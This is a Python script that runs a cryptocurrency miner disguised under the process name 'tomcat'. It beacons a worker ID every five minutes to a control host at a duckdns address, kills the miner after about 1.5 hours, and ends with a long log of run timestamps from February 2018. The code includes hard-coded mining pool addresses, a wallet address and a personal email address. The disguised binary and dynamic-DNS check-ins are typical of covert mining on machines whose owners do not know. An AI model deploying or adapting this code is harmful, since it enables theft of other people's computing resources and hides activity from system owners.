import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:07.995259
#2018-02-17 17:09:09.414210
#2018-02-17 18:58:05.530547
#2018-02-17 20:47:01.986364
#2018-02-17 22:34:04.020495
#2018-02-18 00:17:05.361525
#2018-02-18 02:08:02.210124
#2018-02-18 03:55:07.989486
#2018-02-18 05:42:07.488129
#2018-02-18 07:34:07.916556
#2018-02-18 09:22:05.973625
#2018-02-18 11:09:06.872689
#2018-02-18 12:56:05.836039
#2018-02-18 14:43:07.040452
#2018-02-18 16:33:04.393837
#2018-02-18 18:22:06.943719
#2018-02-18 20:08:04.986790
#2018-02-18 21:55:03.802585
#2018-02-18 23:44:05.193554
#2018-02-19 01:30:05.571490
#2018-02-19 03:18:06.053671
#2018-02-19 05:03:04.721034
#2018-02-19 06:47:06.961092
#2018-02-19 08:38:07.098371
#2018-02-19 10:27:04.068008
#2018-02-19 12:15:10.405618
#2018-02-19 14:03:01.399949
#2018-02-19 15:51:01.794040
#2018-02-19 17:38:08.996115
#2018-02-19 19:25:08.495101
#2018-02-19 21:11:05.594171
#2018-02-19 22:59:06.623213
#2018-02-20 00:44:03.878647
#2018-02-20 02:36:05.621642
#2018-02-20 04:25:03.155350
#2018-02-20 06:09:01.908290
#2018-02-20 07:54:04.742147
#2018-02-20 09:39:01.291843
#2018-02-20 11:22:07.039689
#2018-02-20 13:10:03.128252
#2018-02-20 14:54:08.202784
#2018-02-20 16:39:08.300061
#2018-02-20 18:26:09.359643
#2018-02-20 20:19:01.682184
#2018-02-20 22:04:05.591644
#2018-02-20 23:44:05.713647
#2018-02-21 01:31:08.494742
#2018-02-21 03:20:07.410801
#2018-02-21 07:01:07.661468
#2018-02-21 08:47:07.695233
#2018-02-21 10:33:08.154730
#2018-02-21 12:22:09.579910
#2018-02-21 14:10:08.487384
#2018-02-21 15:55:10.803561
#2018-02-21 17:46:11.690132
#2018-02-21 19:33:05.796250
#2018-02-21 21:20:01.866684
#2018-02-21 23:06:07.592814
#2018-02-22 00:54:06.468014
#2018-02-22 02:42:05.169907
#2018-02-22 04:29:06.100088
#2018-02-22 06:15:09.111768
#2018-02-22 08:01:06.203374
#2018-02-22 09:49:03.749080
#2018-02-22 11:33:10.652076
#2018-02-22 13:19:06.744069
#2018-02-22 15:08:06.409069
#2018-02-22 16:53:02.105138
#2018-02-22 18:41:06.508127
#2018-02-22 20:33:02.002723
#2018-02-22 22:18:07.163739
#2018-02-23 00:06:06.472270
#2018-02-23 01:54:04.428562
#2018-02-23 03:42:04.151799
#2018-02-23 05:26:01.430032
#2018-02-23 07:12:02.140002
#2018-02-23 09:17:06.584224
#2018-02-23 11:23:07.384854
#2018-02-23 13:13:08.438897
#2018-02-23 14:58:05.111306
#2018-02-23 16:48:08.428514
#2018-02-23 18:30:08.347419
#2018-02-23 20:14:07.312956
#2018-02-23 22:03:07.637659
#2018-02-23 23:51:03.893589
#2018-02-24 01:41:06.181569
#2018-02-24 03:31:06.231303
#2018-02-24 05:16:05.521113
#2018-02-24 07:05:04.720003
#2018-02-24 08:52:06.119195
#2018-02-24 10:50:01.476132
#2018-02-24 12:37:06.060420
#2018-02-24 14:25:06.350286
#2018-02-24 16:13:06.626500
#2018-02-24 18:06:05.997802
#2018-02-24 19:52:04.273253
#2018-02-24 21:36:07.928140
#2018-02-25 00:25:06.153900
#2018-02-25 03:30:10.488417
#2018-02-25 07:19:01.911457